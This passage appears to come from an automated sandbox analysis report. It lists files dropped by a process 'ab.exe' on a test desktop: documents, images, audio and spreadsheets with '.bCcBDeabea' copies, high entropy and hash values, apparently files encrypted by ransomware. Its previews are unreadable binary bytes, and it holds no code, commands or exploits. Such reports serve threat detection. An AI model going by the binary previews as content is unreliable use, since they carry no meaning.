Preview:	.....+=52_....>W.H..z.:.l.;.`......^.....lU.].....HA.....4.v...\|.]..:.;.J..h.....#b....;./R.r.s..f//f}.......q....&4...@..&x..x{..1....:[]u;.{.........(a.KJ.K/.w.%.k..1]6p.w&..^O.g.).1G...I...3\|>oY.....T...m..$.."4.6t...4..T.L...W.C.8H..`.kI.o.........Bu.+...D.Rz.....!S..#.x..._.[.R.)i.mO.L`}.pk..1..)......,by...B...:.. 0g......W.... .(..Y....".L...9<......;;..m.q:..S....o.0.t.LOT..X".#K......{...p.5..V..$a.&...[^O].r.'VE1<UD..#`.d.e..U0.6......n...S....%`.....vY"..7.[....\|.m.....n.=okp?..:....>r..qU~<.H......8.W..m......._....Ai..q.}..P..5..#.C...y?.-.c.....O.(}c.^\.F...Z.......M.O=p...2.k.hUK...9.N`.Q.Q.(..m.....T.c9.\|..%w.+u`4g<..N..._...}k.C....U......Ah I.....-BM..f..kI.>...%.?!.p.q....*P...[.a5e....-.!g.Hh..l...D....r..Q...?o..Z.e..&=..R.Jd.nj.W..E.f...A.....q._vB........~.....$# ...2j. .5.{BQ...+..3l....6..;.}...5.._...H...s..eS....(._.X....'j.{.Lj.@.96k..l..G(P.1+..ww\|6......O%........FU.e..x.`r.....L.S.7.q.....Lk.N....2lkE.....Q.g#.w.

C:\Users\user\Desktop\GAOBCVIQIJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.981497081320176
Encrypted:	false
SSDEEP:	192:qzGrGSjQTt3CLCPLXJQpLOW/uUjQr6Ku3q2KUaf++X7bIIcV+n:qPpT9E45uLf/K2KeeUKfX786
MD5:	3396CC70C716549D807D7369852BCF3F
SHA1:	31D6C6115E391A1874829A2BC8845BB82B129853
SHA-256:	C38479E47FB444B527F74246ECC70EEA27E82F27D5916296115A49706856BD31
SHA-512:	F687B53F93B7105A1472A8CDE059BDA8EF1DE91B0C8DE83095BE834A1597BF404C27D9606CC99705AFA7F3746C533C7F5536808275838FDB8CC6A91566A277CE
Malicious:	false
Preview:	..........G..(...~.M...}.@];..c..k.B.....'.F.......W..{.f+.#.Nc..,.$.!...._.%0z.>.k.QX.@f.Z.mS..\.....!...RA...-...\\|,\..P.l."...........0..-[]Ff.g.o...3..ks...=X.S...b...{.2'...S5)Kv...T.m.)q..b...I ..........k.....S..S......G.L\|..j.i.O..Vy.o....c..)..c.6.]I..4kL.fP..M.9.4.Xe.e&p.........v...Gq....JxY..Am...H....<^..N....>......B'Bn...k..bG.$.2.....3.....=.t.T..B.f..[G...BfV3.#:......./..A..~.80..l..._..,.a.....[...d....'.....7.......i...<._..SO...{&.{0..&.....i..\A.[.#h".b..\|....J.N....X......._.=e!.k.n...;.Q...M.8,.7.o..-N.}{m_.9.o.....8.K..v.......x......G.5......Z.....1J.$l..4..0E...t..c0Y.?.+..W(.R$.xD.R..C.s.Yd..".....R..0%...ZN.?X..S.~.z....+,.4O..3H.....w..?....f\|.$.;.0....o4i...b..../..fD1.u...<..*T'S.~^..1{...KQ...D>.&.^..3...3.~.........:].f..To......}:...:..#.N..y...h..%.3d....f]`}..D....k/.Q.....;\So.8b.....+zR..T.u....&...&.Kj..D...N`.......z4..O...7G.,.MB..%..l.Y.6........8.....Q.9&i.....fB.W...r\|x@4kD3."}..Y^.

C:\Users\user\Desktop\GAOBCVIQIJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.981497081320176
Encrypted:	false
SSDEEP:	192:qzGrGSjQTt3CLCPLXJQpLOW/uUjQr6Ku3q2KUaf++X7bIIcV+n:qPpT9E45uLf/K2KeeUKfX786
MD5:	3396CC70C716549D807D7369852BCF3F
SHA1:	31D6C6115E391A1874829A2BC8845BB82B129853
SHA-256:	C38479E47FB444B527F74246ECC70EEA27E82F27D5916296115A49706856BD31
SHA-512:	F687B53F93B7105A1472A8CDE059BDA8EF1DE91B0C8DE83095BE834A1597BF404C27D9606CC99705AFA7F3746C533C7F5536808275838FDB8CC6A91566A277CE
Malicious:	false
Preview:	..........G..(...~.M...}.@];..c..k.B.....'.F.......W..{.f+.#.Nc..,.$.!...._.%0z.>.k.QX.@f.Z.mS..\.....!...RA...-...\\|,\..P.l."...........0..-[]Ff.g.o...3..ks...=X.S...b...{.2'...S5)Kv...T.m.)q..b...I ..........k.....S..S......G.L\|..j.i.O..Vy.o....c..)..c.6.]I..4kL.fP..M.9.4.Xe.e&p.........v...Gq....JxY..Am...H....<^..N....>......B'Bn...k..bG.$.2.....3.....=.t.T..B.f..[G...BfV3.#:......./..A..~.80..l..._..,.a.....[...d....'.....7.......i...<._..SO...{&.{0..&.....i..\A.[.#h".b..\|....J.N....X......._.=e!.k.n...;.Q...M.8,.7.o..-N.}{m_.9.o.....8.K..v.......x......G.5......Z.....1J.$l..4..0E...t..c0Y.?.+..W(.R$.xD.R..C.s.Yd..".....R..0%...ZN.?X..S.~.z....+,.4O..3H.....w..?....f\|.$.;.0....o4i...b..../..fD1.u...<..*T'S.~^..1{...KQ...D>.&.^..3...3.~.........:].f..To......}:...:..#.N..y...h..%.3d....f]`}..D....k/.Q.....;\So.8b.....+zR..T.u....&...&.Kj..D...N`.......z4..O...7G.,.MB..%..l.Y.6........8.....Q.9&i.....fB.W...r\|x@4kD3."}..Y^.

C:\Users\user\Desktop\GAOBCVIQIJ.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978097642317819
Encrypted:	false
SSDEEP:	192:4nSV5PDnJomSb4dP/MZJhVZjMukI18+gyPNPzF8cvZ/ifAoFmV+n:4SVFnJJSUsVZJV1zPRzF5gYGD
MD5:	34225C254118F5947327C09C4B3233EC
SHA1:	BEA8D5DF41168A656ABCF9C573818F275AF0E2B8
SHA-256:	9C6846896C72C0826339AE7D84945D058B5EB1C905BE17DB9DCDD4148B36DCA9
SHA-512:	1C8C97D70A10B3101D5681F1775A5A77BF38E0B4E98B93EEA0FD88ED8E476FD97B7F0CC07E133D8ECC89C0735864FF0955ADE98F354D4C5EA042FFE87222A828
Malicious:	false
Preview:	. 4.....B(.B...]..{..&g....~..F....K...../....F?#V..26Q..c.e.\|.x.y2.3....yB.....8.m..%8.<c..v..._T..H<...-.E.SU.<...I.Yt..Z.IkW.M.+..._..`..c.....PP..!....8..S<(&o.c..oC. .KhWW.^.?3I$.......h.t.-....mI..........=....a.Jr...}`85Z.\..>.m;i.3}W.....-..q..x7.".@.t.i...p7..HWoO..A.^6.N..<'I.U..-.T.,.U.0..kH{..?.....0k.,^.&t.A..fcL.......E.5...9u.`2..@[6P...B+..'..r....RB.tmP..2.)...U....'%.w.......(.6...........n.oO\|.I...L....:..!,..s..T(X......-&.E..u&DUBX.&uiK....8PZ>F.V+......T...z.'.......MV.._$.B.....h..... ...9..EQ.l...........P..a:.O../._d....U.i. Kk..:(3FF.x.4.Vs.L._3.c..i=<...$..~{WHO.[f.xv.C..Y .yW7{ \|~.R......U}.....`......).0.#..'..T[.oh.....qVT.U.5.x.9..D...z2fhv.g~.p.V...Ak.7......Ga.zP.......C.:....[L.........qVI'o=Ec.}./..>.-...d..U..E..`~....fC..W.b..".wb.{?:L)...aGy.....\|.LE.iJbm\|.i7H."]..z.L.H.2....CIj}..[.}..3Fa.......P2....{.........V...Aq.h.i2A..GUy.l..W+.f.G..B..(...]..t....i.3.......P.....x.14..<.n.9.#>L.:..5.....1.c

C:\Users\user\Desktop\GAOBCVIQIJ.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978097642317819
Encrypted:	false
SSDEEP:	192:4nSV5PDnJomSb4dP/MZJhVZjMukI18+gyPNPzF8cvZ/ifAoFmV+n:4SVFnJJSUsVZJV1zPRzF5gYGD
MD5:	34225C254118F5947327C09C4B3233EC
SHA1:	BEA8D5DF41168A656ABCF9C573818F275AF0E2B8
SHA-256:	9C6846896C72C0826339AE7D84945D058B5EB1C905BE17DB9DCDD4148B36DCA9
SHA-512:	1C8C97D70A10B3101D5681F1775A5A77BF38E0B4E98B93EEA0FD88ED8E476FD97B7F0CC07E133D8ECC89C0735864FF0955ADE98F354D4C5EA042FFE87222A828
Malicious:	false
Preview:	. 4.....B(.B...]..{..&g....~..F....K...../....F?#V..26Q..c.e.\|.x.y2.3....yB.....8.m..%8.<c..v..._T..H<...-.E.SU.<...I.Yt..Z.IkW.M.+..._..`..c.....PP..!....8..S<(&o.c..oC. .KhWW.^.?3I$.......h.t.-....mI..........=....a.Jr...}`85Z.\..>.m;i.3}W.....-..q..x7.".@.t.i...p7..HWoO..A.^6.N..<'I.U..-.T.,.U.0..kH{..?.....0k.,^.&t.A..fcL.......E.5...9u.`2..@[6P...B+..'..r....RB.tmP..2.)...U....'%.w.......(.6...........n.oO\|.I...L....:..!,..s..T(X......-&.E..u&DUBX.&uiK....8PZ>F.V+......T...z.'.......MV.._$.B.....h..... ...9..EQ.l...........P..a:.O../._d....U.i. Kk..:(3FF.x.4.Vs.L._3.c..i=<...$..~{WHO.[f.xv.C..Y .yW7{ \|~.R......U}.....`......).0.#..'..T[.oh.....qVT.U.5.x.9..D...z2fhv.g~.p.V...Ak.7......Ga.zP.......C.:....[L.........qVI'o=Ec.}./..>.-...d..U..E..`~....fC..W.b..".wb.{?:L)...aGy.....\|.LE.iJbm\|.i7H."]..z.L.H.2....CIj}..[.}..3Fa.......P2....{.........V...Aq.h.i2A..GUy.l..W+.f.G..B..(...]..t....i.3.......P.....x.14..<.n.9.#>L.:..5.....1.c

C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97864135938087
Encrypted:	false
SSDEEP:	192:20TaDQLe6Qt5HDpL4xa6UBGXqM3w9Rza1MvChxIDyV+n:202DAeltHLBusG7+H
MD5:	6C40E0A15375AE854B6CCA84EA7916D2
SHA1:	D35BE7C8D002D4606E43EDA9949CB96A1E117C30
SHA-256:	143634615334FA1F670AA65AE0C494668FC5DFD52A36A46EFFB2D7EDAA187107
SHA-512:	E9BC02BC6C0FB766F514B26EADEF41045A9436214CA852F6207AD8633FB52B86DB19E8EC25A920940B996AEA774F47A3A9FD5E80201C35671B6D16A5CBEE7B9F
Malicious:	false
Preview:	...\|B.~"QK%V..0...Evnu..u.]<...`?)....#.G......v.....{+.....s`..J.k...#...O..B......\....<..8f.a.<^o.9Zch."...j.XoeC..h.!..H..\|.........k..l..n..0'.....^o.._...^.;.~....+....;.U...&T~:...`..H.Q..CT..+.Q4F.........L.. .%..._.A.y......X"...P{.uM...c..k....p.. ..xV.&b2A>f....n.._..n.h/#..6....a.H6...p..n.e.fU.P,O...N.....+'G....g.Uu....D...z.^..A.P..].F.E~.o....}..G..7L..S....s.r....4_D........ibk..1&..F.W...X......m3GEJ.Gzc..;..J"...[.........o.9..k.2!x.'S..}./=i..u.\X.I.....b(R/Y.a?...,.4_...^..-..FZ..7d.B.=.HY......x....f(Sax....l..e..CR..f...LvL.3.:.x.v..._'..11.$mq...$.s,p=89..`.... ...L...'..i............Z.O...f<..;qjM}.p(&...v^......Ub.a5A..B......$........W`/2....p....Je.-...PF.-J.k:.0u.Kx~S'.>......~. Z.q./.....I.]..~9&..j.,..S."..Y....aiY.6Or1.v..dV~."........hy..6!:<.G.....z.^..S.@.Z.pE.s#.+E.I..i.j..p..C..x.C...\.l.z.3".R..G`+...a.h....D!.4e....n....}.......z....0.}dV..<.`.....QMf5.O...J.%f.'Q... .$.Wj.Es..FLE...:..>.........*..].(

C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97864135938087
Encrypted:	false
SSDEEP:	192:20TaDQLe6Qt5HDpL4xa6UBGXqM3w9Rza1MvChxIDyV+n:202DAeltHLBusG7+H
MD5:	6C40E0A15375AE854B6CCA84EA7916D2
SHA1:	D35BE7C8D002D4606E43EDA9949CB96A1E117C30
SHA-256:	143634615334FA1F670AA65AE0C494668FC5DFD52A36A46EFFB2D7EDAA187107
SHA-512:	E9BC02BC6C0FB766F514B26EADEF41045A9436214CA852F6207AD8633FB52B86DB19E8EC25A920940B996AEA774F47A3A9FD5E80201C35671B6D16A5CBEE7B9F
Malicious:	false
Preview:	...\|B.~"QK%V..0...Evnu..u.]<...`?)....#.G......v.....{+.....s`..J.k...#...O..B......\....<..8f.a.<^o.9Zch."...j.XoeC..h.!..H..\|.........k..l..n..0'.....^o.._...^.;.~....+....;.U...&T~:...`..H.Q..CT..+.Q4F.........L.. .%..._.A.y......X"...P{.uM...c..k....p.. ..xV.&b2A>f....n.._..n.h/#..6....a.H6...p..n.e.fU.P,O...N.....+'G....g.Uu....D...z.^..A.P..].F.E~.o....}..G..7L..S....s.r....4_D........ibk..1&..F.W...X......m3GEJ.Gzc..;..J"...[.........o.9..k.2!x.'S..}./=i..u.\X.I.....b(R/Y.a?...,.4_...^..-..FZ..7d.B.=.HY......x....f(Sax....l..e..CR..f...LvL.3.:.x.v..._'..11.$mq...$.s,p=89..`.... ...L...'..i............Z.O...f<..;qjM}.p(&...v^......Ub.a5A..B......$........W`/2....p....Je.-...PF.-J.k:.0u.Kx~S'.>......~. Z.q./.....I.]..~9&..j.,..S."..Y....aiY.6Or1.v..dV~."........hy..6!:<.G.....z.^..S.@.Z.pE.s#.+E.I..i.j..p..C..x.C...\.l.z.3".R..G`+...a.h....D!.4e....n....}.......z....0.}dV..<.`.....QMf5.O...J.%f.'Q... .$.Wj.Es..FLE...:..>.........*..].(

C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978335496028412
Encrypted:	false
SSDEEP:	192:3dLy48vX6c8TqxVyZMjWQXrEeZUEG2wpM/g6ywfYFe53K0V+n:NL38vX6hT4/j7Xrz+Swpg1Doqm
MD5:	C9A28F36D717389FAE7C4426D78950F8
SHA1:	F19CE42DEEC132179CC560A0CFEB1785C8ECF70B
SHA-256:	1BC2F202F3883155505766DEBDB2B83A37EBE1D6FF3BDB03551D2ED960D187C6
SHA-512:	3F76B4FDDE8B7D8BCAB42572F3AC4EB49508EF70B1F7F4552B0E807E5B198C3AC4AAD12CCD29288C4735E30B94823C90EF8C602B6E64A2B63474967CAA80B6FC
Malicious:	false
Preview:	.....FN.l_..L..P<..\@.!^o..5.one.s.[.....O..1.k....pf.A..o}....o .c"XxY.BR..-.`..iu.s....NgsnE.N...V.^.h..u....H.!,.7.c>,D.i...-.C.f.QhVd.O..1.p...O...........Z.t....4...l^.....-.B..)..Qcp.w%4.Pv.......d...f.o2Qn......r...d...P...K8(..#..[.......v]wv...6.l..!.W".YE4...b}... ...J.....r....@.2..A.\#.....j^.W.......Nt..QUF\|..(0a ..\|..S{c.MM.P. 9M.Z...C.......9.\|/z.M.:c.w.3.v..>.t......<......DkL.H&.P^...9..V.Q........F.@]..'..75RP,-O.%..,./..vu..x4!\|.......J.....$X......?.....2.L....H......I......../j.k..z.CLh.....TY.a......d.E......:.....>....<..../.;.}G...g..e...C$.C.Z...0n.`{.Y.$.w..$..Y..1b2.W...E8b$...!!.@...K...'.g...../.....~..Q6.c.a.(.E.....\|..p.q..}..#j.....`B.G........Q...Jj..h... ...'u...K.^l..K......:C..A.X\|..x.j.....#.e..J.j."..Ky.....^.7..h.K9.5.7}.....Rla..:.......c.2..q..M".%.~.......C\.."V$bf...........5z.r.l..aH.Qm..mgY.[..4..j.d....>.....T..gH../..l..im7.......y... ...@..p.n...5.....1.........#....(..`S\|V....AIb..

C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978335496028412
Encrypted:	false
SSDEEP:	192:3dLy48vX6c8TqxVyZMjWQXrEeZUEG2wpM/g6ywfYFe53K0V+n:NL38vX6hT4/j7Xrz+Swpg1Doqm
MD5:	C9A28F36D717389FAE7C4426D78950F8
SHA1:	F19CE42DEEC132179CC560A0CFEB1785C8ECF70B
SHA-256:	1BC2F202F3883155505766DEBDB2B83A37EBE1D6FF3BDB03551D2ED960D187C6
SHA-512:	3F76B4FDDE8B7D8BCAB42572F3AC4EB49508EF70B1F7F4552B0E807E5B198C3AC4AAD12CCD29288C4735E30B94823C90EF8C602B6E64A2B63474967CAA80B6FC
Malicious:	false
Preview:	.....FN.l_..L..P<..\@.!^o..5.one.s.[.....O..1.k....pf.A..o}....o .c"XxY.BR..-.`..iu.s....NgsnE.N...V.^.h..u....H.!,.7.c>,D.i...-.C.f.QhVd.O..1.p...O...........Z.t....4...l^.....-.B..)..Qcp.w%4.Pv.......d...f.o2Qn......r...d...P...K8(..#..[.......v]wv...6.l..!.W".YE4...b}... ...J.....r....@.2..A.\#.....j^.W.......Nt..QUF\|..(0a ..\|..S{c.MM.P. 9M.Z...C.......9.\|/z.M.:c.w.3.v..>.t......<......DkL.H&.P^...9..V.Q........F.@]..'..75RP,-O.%..,./..vu..x4!\|.......J.....$X......?.....2.L....H......I......../j.k..z.CLh.....TY.a......d.E......:.....>....<..../.;.}G...g..e...C$.C.Z...0n.`{.Y.$.w..$..Y..1b2.W...E8b$...!!.@...K...'.g...../.....~..Q6.c.a.(.E.....\|..p.q..}..#j.....`B.G........Q...Jj..h... ...'u...K.^l..K......:C..A.X\|..x.j.....#.e..J.j."..Ky.....^.7..h.K9.5.7}.....Rla..:.......c.2..q..M".%.~.......C\.."V$bf...........5z.r.l..aH.Qm..mgY.[..4..j.d....>.....T..gH../..l..im7.......y... ...@..p.n...5.....1.........#....(..`S\|V....AIb..

C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980830467973997
Encrypted:	false
SSDEEP:	192:eppMigRHIxjjA86PivzJQPz7hqIRe0xZh6McVuV+n:0pM95IW3Pezs7kMnC7
MD5:	F8BA46F9A80CF8A8F35E7218FA651F42
SHA1:	87CE8DC9DADBD630DF7EB78F4E71B5C027915988
SHA-256:	BF079E760365D2975E6DE609DA142983135F55E7103368901804529B01CFF673
SHA-512:	9625A71461B55854D3D30844AB3405151FF58D5DB56F176E05E0DBC8DC001C6B63F71B2BDE39FE4DA1FE71F89B1AADF116321AB7F9214C14BEE6394E9AEAA87D
Malicious:	false
Preview:	Z...qG..~.....^T:f...H...^Li..8r&..A.........j.{h.0.\i..R.eV...F....$.;...\|K.7=E-.u....I].5j..T...3..bg...[X.Cf.n...P.^.y....i.....D..,0K%......H$.l35....j..L....8..!..~...\|m6i...P..C..h.!q.=7~NX...1..)}.....P.%..w.d.:...o.........L.0.."I..uw.~{....w.M...Dy....".hG6..o......6...G.)..%.J...}p..Q......oJx.q..B...0........_#b.<c<.....az..z.e^..P.3X2.7`c~jm..s...}..........'[.../K...Ep..e\.z...myhL..Q...h}.J.^......C.....w.".'.r.J.q........S....H.....nT8.6f,.S.y.ZSt....2c`m/...+....;...~p.{.....W'..-\|%..rH..y&;.;{.....Kq..(..:.S<.SFL...'.....v..........eZ.....M.".....0..s`.}.=..k4D..+t.).......;..dxdakv...............$.)......{.......{9+F.3.d.e.....u..c.......7.....l....-.QA@.y..#5;.C..n.hJ..u.......z8...6Z..v..F=...F...%...A=38[..=..V...R.B.`...,(@$*.W..n0... !.,.+.o.C.p...{^..h.0...!.n&.!..v...4.T...&X..Zb.B.E.6..(.5..3..d...p.!U..u.".4.D..\|..I....j.@X..z....o@yX...0.2....:<'.........T..P.!...S.[...Q....NQ......5.._[0.......TRO...%.".....?.?NE:.

C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980830467973997
Encrypted:	false
SSDEEP:	192:eppMigRHIxjjA86PivzJQPz7hqIRe0xZh6McVuV+n:0pM95IW3Pezs7kMnC7
MD5:	F8BA46F9A80CF8A8F35E7218FA651F42
SHA1:	87CE8DC9DADBD630DF7EB78F4E71B5C027915988
SHA-256:	BF079E760365D2975E6DE609DA142983135F55E7103368901804529B01CFF673
SHA-512:	9625A71461B55854D3D30844AB3405151FF58D5DB56F176E05E0DBC8DC001C6B63F71B2BDE39FE4DA1FE71F89B1AADF116321AB7F9214C14BEE6394E9AEAA87D
Malicious:	false
Preview:	Z...qG..~.....^T:f...H...^Li..8r&..A.........j.{h.0.\i..R.eV...F....$.;...\|K.7=E-.u....I].5j..T...3..bg...[X.Cf.n...P.^.y....i.....D..,0K%......H$.l35....j..L....8..!..~...\|m6i...P..C..h.!q.=7~NX...1..)}.....P.%..w.d.:...o.........L.0.."I..uw.~{....w.M...Dy....".hG6..o......6...G.)..%.J...}p..Q......oJx.q..B...0........_#b.<c<.....az..z.e^..P.3X2.7`c~jm..s...}..........'[.../K...Ep..e\.z...myhL..Q...h}.J.^......C.....w.".'.r.J.q........S....H.....nT8.6f,.S.y.ZSt....2c`m/...+....;...~p.{.....W'..-\|%..rH..y&;.;{.....Kq..(..:.S<.SFL...'.....v..........eZ.....M.".....0..s`.}.=..k4D..+t.).......;..dxdakv...............$.)......{.......{9+F.3.d.e.....u..c.......7.....l....-.QA@.y..#5;.C..n.hJ..u.......z8...6Z..v..F=...F...%...A=38[..=..V...R.B.`...,(@$*.W..n0... !.,.+.o.C.p...{^..h.0...!.n&.!..v...4.T...&X..Zb.B.E.6..(.5..3..d...p.!U..u.".4.D..\|..I....j.@X..z....o@yX...0.2....:<'.........T..P.!...S.[...Q....NQ......5.._[0.......TRO...%.".....?.?NE:.

C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977158935336416
Encrypted:	false
SSDEEP:	192:dzsqkcr3YwgloaN7nS+vBtu//M4YZqgWur1oU+cMjteq4eg7zmM1l4gjbsg/ffvA:VKvlj5nNu04YFDpoJxXGzmutj5/ff4
MD5:	A6CB7175C912634850C25A8FA2F9F2DE
SHA1:	0DD7E4574FEF7DF05E215F7F726A3DEB0D821DFE
SHA-256:	DC28F1D7D7124FF81C16D53942A43771A2C58F22061CD74885EEB6788AA63BF1
SHA-512:	7A806504E47B10B13C6390309D2BF610DB49DB3115C4F33CCD1FBA22244A4623B0700C19CC96C1E8FBEA8ADAE6DAC1EFD63783B3CA9B77A4262BA5B64865E95F
Malicious:	false
Preview:	..lU.m.XB.......rWh>W....cu.......n...P..m"......G.......!o~........n.....v.$...\|.. .k.Mh.m..e...`.4.f.Elg\.I.$L.n..g..TM#)..r...W.....`..!..EP.De%.%..6\|).....`.5 .CCi......%....0[..LA..O b..1....Gk.^....X~u1&..V)F..wl.-{.Ns-.........1o.Y.K.4B......SR..#..2V.............~......8...f;BY.H.y.<....7..t....9=s...Nl....g.aK?Q&z....$Wt..<.jdFC.K..i...l....'`.".0Q(.......B+x..^..n..i...s..E..I.$7&.[V.M.#.o..RuLF.{.^/...@....2.[.5..e..C..T...z..n......v3.84}shV.....].....iJ.......@@O..i&.I;8.2..d{...[.(.......x...y.u..h..".g[..G..lF.?.G.S,,..%..O....b]S.P...Y.{.8.......Q...$.E.."...c.Ej.IQ9..!.lVq.j.R..@.X..}5.;...:`.H..?z.bj.q...{.M..Kr.......;HT.j"........n...1.9..W.3U!..?.(....6...f.Y7..A..Ox....{.,.-.......fg~M.......4Y...A......^dt.:...xJ`v....d.E..y.Q.....s.j."T.=P...8..$....y.......?...1.$Pfv...b:Y....2o.y...R'"=..... FK\|..J...%.G..u..b...PZ{.../.....0.~le.o...w.....X..M.#eQ..:u....=...v.Z..N6..!....m..1*.g....s.a.....M[.q=(....k<`..

C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977158935336416
Encrypted:	false
SSDEEP:	192:dzsqkcr3YwgloaN7nS+vBtu//M4YZqgWur1oU+cMjteq4eg7zmM1l4gjbsg/ffvA:VKvlj5nNu04YFDpoJxXGzmutj5/ff4
MD5:	A6CB7175C912634850C25A8FA2F9F2DE
SHA1:	0DD7E4574FEF7DF05E215F7F726A3DEB0D821DFE
SHA-256:	DC28F1D7D7124FF81C16D53942A43771A2C58F22061CD74885EEB6788AA63BF1
SHA-512:	7A806504E47B10B13C6390309D2BF610DB49DB3115C4F33CCD1FBA22244A4623B0700C19CC96C1E8FBEA8ADAE6DAC1EFD63783B3CA9B77A4262BA5B64865E95F
Malicious:	false
Preview:	..lU.m.XB.......rWh>W....cu.......n...P..m"......G.......!o~........n.....v.$...\|.. .k.Mh.m..e...`.4.f.Elg\.I.$L.n..g..TM#)..r...W.....`..!..EP.De%.%..6\|).....`.5 .CCi......%....0[..LA..O b..1....Gk.^....X~u1&..V)F..wl.-{.Ns-.........1o.Y.K.4B......SR..#..2V.............~......8...f;BY.H.y.<....7..t....9=s...Nl....g.aK?Q&z....$Wt..<.jdFC.K..i...l....'`.".0Q(.......B+x..^..n..i...s..E..I.$7&.[V.M.#.o..RuLF.{.^/...@....2.[.5..e..C..T...z..n......v3.84}shV.....].....iJ.......@@O..i&.I;8.2..d{...[.(.......x...y.u..h..".g[..G..lF.?.G.S,,..%..O....b]S.P...Y.{.8.......Q...$.E.."...c.Ej.IQ9..!.lVq.j.R..@.X..}5.;...:`.H..?z.bj.q...{.M..Kr.......;HT.j"........n...1.9..W.3U!..?.(....6...f.Y7..A..Ox....{.,.-.......fg~M.......4Y...A......^dt.:...xJ`v....d.E..y.Q.....s.j."T.=P...8..$....y.......?...1.$Pfv...b:Y....2o.y...R'"=..... FK\|..J...%.G..u..b...PZ{.../.....0.~le.o...w.....X..M.#eQ..:u....=...v.Z..N6..!....m..1*.g....s.a.....M[.q=(....k<`..

C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9762813311262475
Encrypted:	false
SSDEEP:	192:aEj1nxX9wZUTo3o3qj3WgI4dGKlpGyG4q9KZdL5V+n:aEZnxNwP46j3WgI1Sqo/q
MD5:	ACD1E08330F0F55B4C6A1553605CA23B
SHA1:	A26301AAB709489262E996BF153691B6AC619B9B
SHA-256:	E97D8E60BB698D7D45A5D2367730336E56A7EB5714D8F682A6CAAD7B8C40D404
SHA-512:	596030F457D215AD6A9887DBA654770B59965394D05D2F6DD0FC659A28E55CE5CF4EED5E4386C716A5A65364D6517F815DE9F20219BC9D600E9DD2797AA405D2
Malicious:	false
Preview:	... 0T....(....\|".8....]E..q...E#Nsb..`.K.....]....fw......':i......m.%.ey...k.KzM!f.:........:..a...`.6.U`....q.Xe..:_.....">w.^.9.....{..ogT...V.<.....d.. .1z,:...).I...!.r.Q........B.E...z..n.C..).d.=...z...-&>..."."...?.Y.....G...W.9Ir_vL...GH....<s..B...............tG....<...[].Y.%..^....\|..LX.......K-......5Y9c`..k..%Ru..0.rh.~.Y..]..tx87......"&..^.....Q....:,..".k..Bbq.N..5L...Tz.......>..,H...V.....S...z.....nu.c....eNNX.z.r4J........h..S...>......6..%+.Ug...F...-K0..#N...0Kz..Q.8...W..W.....G.>.../.{..q..ud.. r..n...f..{.D80..f........o0......:"..:..<..>=UP.....>.w.i.......N...... ...<...?.W...[.H....O..Q...[..,.....v.+..C _?UO.uHqj..:;/.,.....k I.~nk.>-F.aUf..<B.......b.h...,d.>...`.2...D;,...H.....1 J.L..pCR.r...[...{...F.3<~....._X.PE.1(..r..(.O%.~......@KJ..^./..>/S6&...gbM.b.@...*..a.f\|.....G..,<.4...S..v..j....~Oh..NQ# ........C..@....7.N.7r...(.FS.o...9.].V....?Y..DC4\|.,...%....:....C..DGH+.E}....9Se...~.2d.V..m.-..'...

C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9762813311262475
Encrypted:	false
SSDEEP:	192:aEj1nxX9wZUTo3o3qj3WgI4dGKlpGyG4q9KZdL5V+n:aEZnxNwP46j3WgI1Sqo/q
MD5:	ACD1E08330F0F55B4C6A1553605CA23B
SHA1:	A26301AAB709489262E996BF153691B6AC619B9B
SHA-256:	E97D8E60BB698D7D45A5D2367730336E56A7EB5714D8F682A6CAAD7B8C40D404
SHA-512:	596030F457D215AD6A9887DBA654770B59965394D05D2F6DD0FC659A28E55CE5CF4EED5E4386C716A5A65364D6517F815DE9F20219BC9D600E9DD2797AA405D2
Malicious:	false
